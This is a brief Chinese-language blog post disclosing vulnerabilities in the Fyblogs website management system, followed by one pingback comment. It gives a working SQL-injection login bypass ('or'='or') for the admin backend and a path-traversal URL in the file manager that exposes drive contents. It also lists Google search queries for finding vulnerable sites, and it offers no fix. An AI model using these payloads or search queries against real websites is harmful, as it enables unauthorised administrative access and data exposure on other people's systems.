Fyblogs网站管理系统漏洞

后台万能密码 'or'='or'
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
admin/uploadfile.asp?currentFolder=/upfiles/../

漏洞证明:

谷歌:inurl:type.asp?id=1 新闻中心
或者 :inurl:download_ok.asp?

1 条评论

  1. Fyblogs网站管理系统漏洞 | Drk@Dis9Team

    [...] 原文地址:http://www.0day5.com/?p=407 [...]

发表评论